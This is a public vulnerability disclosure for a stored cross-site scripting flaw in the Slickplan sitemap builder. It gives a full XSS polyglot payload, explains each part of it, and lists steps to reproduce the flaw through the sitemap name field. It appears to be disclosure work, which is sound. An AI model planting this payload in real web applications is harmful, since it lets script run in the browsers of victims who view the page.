Product Owner: Slickplan Sitemap Builder
Found by: xdff4ee
Application Name: Basic sitemap builder Version 1.0
Severity: High
Authentication: Required
Complexity: Easy
Vulnerability Name: Stored Cross-site scripting - XSS Polyglot (Stored)
Vulnerability Explanation: An XSS polyglot can be generally defined as an XSS vector that is executable within various injection contexts in its raw form.
Browsers Verified In:
Firefox 68.0.2 (64-bit)
Google Chrome 76.0.3809.100 (64-bit)
Anatomy of the polyglot
jaVasCript:: A label in ECMAScript; a URI scheme otherwise.
/*-/*`/*\`/*'/*"/**/: A multi-line comment in ECMAScript; a literal-breaker sequence.
(/* */oNcliCk=alert() ): A tangled execution zone wrapped in invoking parenthesis!
//%0D%0A%0d%0a//: A single-line comment in ECMAScript; a double-CRLF in HTTP response headers.
</stYle/</titLe/</teXtarEa/</scRipt/--!>: A sneaky HTML-tag-breaker sequence.
\x3csVg/<sVg/oNloAd=alert()//>\x3e: An innocuous svg element.
Impact:
Stored XSS allows an attacker to embed a malicious script into a vulnerable page, which is then executed when a victim views the page. Reflected cross-site scripting relies on a victim being socially engineered into clicking on a malicious link, sent via email for example.
Proof of Concept: (Stored Cross-site scripting - XSS Polyglot (Stored))
Affected items:
Sitemap:
Url: https://lmentrix.slickplan.com/sitemap/edit/nxwhsr7gra
Stored Polyglot XSS Execution - Different browser
Payload Used:
HTML comments:
<!--
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(123) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(123)//>\x3e
-->
Step to reproduce:
Login with a valid username and password
Enter the above-provided payload on the Sitemap Name field, then click create the sitemap, the stored Polyglot XSS payload will reflect on your browser.
Even after refreshing the page & also clearing the cookies, the XSS payload will execute on the browsers.
Complete POC Video is also attached for better understanding.
After continuous e-mail, the vendor didn't reply, so I decided to disclose publicly.